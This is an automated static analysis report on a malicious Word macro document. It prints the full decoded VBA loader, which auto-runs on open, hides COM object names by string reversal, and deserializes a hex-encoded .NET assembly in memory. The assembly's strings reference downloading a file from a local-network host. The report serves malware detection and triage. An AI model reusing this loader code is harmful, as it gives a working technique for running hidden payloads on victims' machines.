Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8b8fa75496b3337d…

MALICIOUS

Office (OOXML)

34.5 KB Created: 2021-04-14 22:22:00 UTC Authoring application: 16.0000 First seen: 2021-05-04
MD5: 595a1a23df92b7179bbcc69218369e5d SHA-1: 4f8bb30a24de0468c613f79e881f581e64594717 SHA-256: 8b8fa75496b3337d034d7ee562e92785eba58d3f4fdaa426ed8c0ebb742d4fc6
300 Risk Score

Heuristics 9

  • ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set DM1 = CreateObject(comida("MODLMX.tfosorciM"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set DM1 = CreateObject(comida("MODLMX.tfosorciM"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 16894 bytes
SHA-256: 169e5a82b167941d67bd3b6057a1e2d88c2737e5c2c64d5f2aa1a1cc53d9ab25
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 43 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function comida(c)
    comida = StrReverse(c)
End Function
Sub DebugPrint(s)
End Sub

Private Function dh(hex)
    On Error Resume Next
    Dim DM1, EL1
    Set DM1 = CreateObject(comida("MODLMX.tfosorciM"))
    Set EL1 = DM1.createElement(comida("pmt"))
    EL1.DataType = comida("xeh.nib")
    EL1.Text = hex
    dh = EL1.NodeTypedValue
End Function

Function rn()
    On Error Resume Next
    
    If ActiveDocument.Name <> comida("mcod.tseT") Then
      Exit Function
    End If

    Dim s As String
    s = "0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C65"
    s = s & "6761746553657269616C697A6174696F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C64657209020000000903000000090400000004020000003053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727907000000047479706508"
    s = s & "617373656D626C79067461726765741274617267657454797065417373656D626C790E746172676574547970654E616D650A6D6574686F644E616D650D64656C6567617465456E747279010102010101033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374656D2E52756E74696D65"
    s = s & "2E52656D6F74696E672E4D6573736167696E672E48656164657248616E646C657206060000004B6D73636F726C69622C2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530383906070000000774617267657430090600000006090000000F53797374656D2E44656C6567"
    s = s & "617465060A0000000D44796E616D6963496E766F6B650A04030000002253797374656D2E44656C656761746553657269616C697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300307033053797374656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E747279022F53797374"
    s = s & "656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C646572090B000000090C000000090D00000004040000002F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C64657206000000044E616D650C417373656D626C794E616D6509436C6173734E616D65095369676E6174"
    s = s & "7572650A4D656D626572547970651047656E65726963417267756D656E7473010101010003080D53797374656D2E547970655B5D090A0000000906000000090900000006110000002C53797374656D2E4F626A6563742044796E616D6963496E766F6B652853797374656D2E4F626A6563745B5D29080000000A010B0000000200000006120000002053797374656D2E586D6C2E5363"
    s = s & "68656D612E586D6C56616C756547657474657206130000004D53797374656D2E586D6C2C2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530383906140000000774617267657430090600000006160000001A53797374656D2E5265666C656374696F6E2E417373656D62"
    s = s & "6C790617000000044C6F61640A0F0C00000000140000024D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000"
    s = s & "00504500004C010300F36B77600000000000000000E00002210B013000000A00000008000000000000D6280000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000842800004F000000004000000C0400000000000000"
    s = s & "0000000000000000000000006000000C0000004C2700001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000DC08000000200000000A000000020000000000000000000000000000200000602E727372630000000C0400"
    s = s & "000040000000060000000C0000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001200000000000000000000000000004000004200000000000000000000000000000000B828000000000000480000000200050088200000C40600000300000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "000000000000000000000000000000BA02280E00000A72010000707201000070161F30280F00000A26731000000A720D00007072470000706F1100000A2A2203281200000A262A42534A4201000100000000000C00000076322E302E35303732370000000005006C00000018020000237E000084020000A002000023537472696E677300000000240500007C00000023555300A00500"
    s = s & "00100000002347554944000000B00500001401000023426C6F620000000000000002000001471500000900000000FA0133001600000100000015000000020000000200000001000000120000000E0000000100000003000000000071010100000000000600E100E50106004E01E50106002E00B3010F0005020000060056009B010600C4009B010600A5009B01060035019B01060001"
    s = s & "019B0106001A019B0106006D009B0106004200C60106002000C601060088009B010600500285010A00840214020A00620214020A00290214020A008C0114020E006F0257020E004802B3010000000001000000000001000100010010003B0200003D00010001005020000000008618AD01060001007F20000000008600450210000100000001006C010900AD0101001100AD01060019"
    s = s & "00AD010A002900AD0110003100AD0110003900AD0110004100AD0110004900AD0110005100AD0110005900AD0110006100AD0115006900AD0110007100AD0110007900AD01060081007F021A00A100AD010600A10013002500A90079022B002E000B003A002E00130043002E001B0062002E0023006B002E002B0080002E003300AA002E003B00AA002E0043006B002E004B00B0002E"
    s = s & "005300AA002E005B00AA002E006300D5002E006B00FF0043005B000C010480000001000000000000000000000000008F02000002000000000000000000000031000A00000000000200000000000000000000003100140200000000020000000000000000000000310085010000000000000000003C4D6F64756C653E006D73636F726C696200446F776E6C6F616446696C6500477569"
    s = s & "644174747269627574650044656275676761626C6541747472696275746500436F6D56697369626C6541747472696275746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275746500417373656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F"
    s = s & "6E41747472696275746500417373656D626C794465736372697074696F6E41747472696275746500436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F7079726967687441747472696275746500417373656D626C79436F6D70616E794174747269627574650052"
    s = s & "756E74696D65436F6D7061746962696C6974794174747269627574650070617468004578616D706C65417373656D626C792E646C6C0053797374656D004D657373616765426F7849636F6E0053797374656D2E5265666C656374696F6E002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F70536572766963657300"
    s = s & "53797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053797374656D2E57696E646F77732E466F726D73004D657373616765426F78427574746F6E730054657374436C6173730052756E50726F63657373004F626A6563740053797374656D2E4E6574004469616C6F67526573756C7400576562436C69656E74005374"
    s = s & "6172740053686F77004D657373616765426F78004578616D706C65417373656D626C790000000B54006500730074003200003968007400740070003A002F002F003100390032002E003100360038002E0030002E00310032002F00660069006C0065002E00740078007400003163003A005C00550073006500720073005C005000750062006C00690063005C00660069006C0065002E"
    s = s & "007400780074000000000066B707945590B14AB3C8C3F4D6F71F2D00042001010803200001052001011111042001010E04200101020A000411450E0E1149114D052002010E0E05000112550E08B77A5C561934E0890801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F7773010801000200000000001401000F4578616D706C65417373656D"
    s = s & "626C790000290100244578616D706C6520417373656D626C7920666F7220446F744E6574546F4A53637269707400000501000000002401001F436F7079726967687420C2A9204A616D657320466F7273686177203230313700002901002435363539386631632D366438382D343939342D613339322D61663333376162653537373700000C010007312E302E302E3000000501000100"
    s = s & "00000000000000F36B776000000000020000001C010000682700006809000052534453C3BDC55ACF2F0A49AED976707495C63A01000000433A5C55736572735C73656375726974795C546F6F6C735C446F744E6574546F4A5363726970742D6D61737465725C4578616D706C65417373656D626C795C6F626A5C7838365C52656C656173655C4578616D706C65417373656D626C792E"
    s = s & "706462000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "000000000000000000000000000000AC2800000000000000000000C6280000002000000000000000000000000000000000000000000000B8280000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000"
    s = s & "000000000000000100000000004800000058400000B00300000000000000000000B00334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066"
    s = s & "006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B00410030000010053007400720069006E006700460069006C00650049006E0066006F000000EC020000010030003000300030003000340062003000000062002500010043006F006D006D0065006E007400730000004500780061006D0070006C006500200041007300730065"
    s = s & "006D0062006C007900200066006F007200200044006F0074004E006500740054006F004A005300630072006900700074000000000022000100010043006F006D00700061006E0079004E0061006D0065000000000000000000480010000100460069006C0065004400650073006300720069007000740069006F006E00000000004500780061006D0070006C00650041007300730065"
    s = s & "006D0062006C0079000000300008000100460069006C006500560065007200730069006F006E000000000031002E0030002E0030002E003000000048001400010049006E007400650072006E0061006C004E0061006D00650000004500780061006D0070006C00650041007300730065006D0062006C0079002E0064006C006C00000062001F0001004C006500670061006C0043006F"
    s = s & "007000790072006900670068007400000043006F0070007900720069006700680074002000A90020004A0061006D0065007300200046006F007200730068006100770020003200300031003700000000002A00010001004C006500670061006C00540072006100640065006D00610072006B00730000000000000000005000140001004F0072006900670069006E0061006C00460069"
    s = s & "006C0065006E0061006D00650000004500780061006D0070006C00650041007300730065006D0062006C0079002E0064006C006C000000400010000100500072006F0064007500630074004E0061006D006500000000004500780061006D0070006C00650041007300730065006D0062006C0079000000340008000100500072006F006400750063007400560065007200730069006F"
    s = s & "006E00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000D838000000000000000000"
    s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    s = s & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000010D00000004000000091700000009060000000916000000061A0000002753797374656D2E5265666C656374696F6E2E417373656D626C79204C6F616428427974655B5D29080000000A0B"

    ec = "TestClass"

    Dim stm As Object, fmt As Object, al As Object
    Set stm = CreateObject(comida("maertSyromeM.OI.metsyS"))

    If stm Is Nothing Then
        manifest = comida("reS.emitnuR.metsyS=digorp }7D4C9AA9D5A2-11BB-A873-5F39-FA7ABC0D{=dislc ssalCrlc<>/ 980E439165C5A77B=nekoTyeKcilbup 0.0.0.4=noisrev bilrocsm=eman ytitnedIylbmessa<>0.1=noisreVtsefinam 1v.msa:moc-tfosorcim-samehcs:nru=snlmx ylbmessa<>?sey=enoladnats 61-FTU=gnidocne 0.1=noisrev lmx?<")
        manifest = manifest & comida("oC.metsyS=eman htoB=ledoMgnidaerht tsiLyarrA.snoitcelloC.metsyS=digorp }74386418F9CB-13DB-7A93-E554-647709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur rettamroFyraniB.yraniB.srettamroF.noitazilaireS.emitnuR.metsyS=eman htoB=ledoMgnidaerht rettamroFyraniB.yraniB.srettamroF.noitazilai")
        manifest = manifest & comida(".metsyS=digorp }74388418F9CB-13DB-7A93-E554-648709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur gnidocnEIICSA.txeT.metsyS=eman htoB=ledoMgnidaerht gnidocnEIICSA.txeT.metsyS=digorp }74386418F9CB-13DB-7A93-E554-648709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur tsiLyarrA.snoitcell")
        manifest = manifest & comida("Vemitnur maertSyromeM.OI.metsyS=eman htoB=ledoMgnidaerht maertSyromeM.OI.metsyS=digorp }74B86418F9CB-13DB-7A93-E554-648709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur mrofsnarT46esaBmorF.yhpargotpyrC.ytiruceS.metsyS=eman htoB=ledoMgnidaerht mrofsnarT46esaBmorF.yhpargotpyrC.ytiruceS")
        manifest = manifest & "ersion=""v4.0.30319"" /></assembly>"

        Set ax = CreateObject("Microsoft.Windows.ActCtx")
        ax.ManifestText = manifest
        
        Set stm = ax.CreateObject(comida("maertSyromeM.OI.metsyS"))
        Set fmt = ax.CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
        Set al = ax.CreateObject("System.Collections.ArrayList")
    Else
        Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
        Set al = CreateObject("System.Collections.ArrayList")
    End If

    Dim dec
    dec = dh(s)

    For Each i In dec
        stm.WriteByte i
    Next i

    stm.Position = 0

    Dim n As Object, d As Object, o As Object
    Set d = fmt.Deserialize_2(stm)
    al.Add Empty

    Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(ec)
    
    If Err.Number <> 0 Then
      DebugPrint Err.Description
      Err.Clear
    End If
End Function

Sub AutoOpen()
  rn
End Sub

Sub Document_Open()
  rn
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 69632 bytes
SHA-256: c056f6ff43130e6cf2f4a15620888314447ed37b31640eb055fe7e81e49f4007
Detection
ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1
Obfuscation or payload: likely
Carved artifact contains 44 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.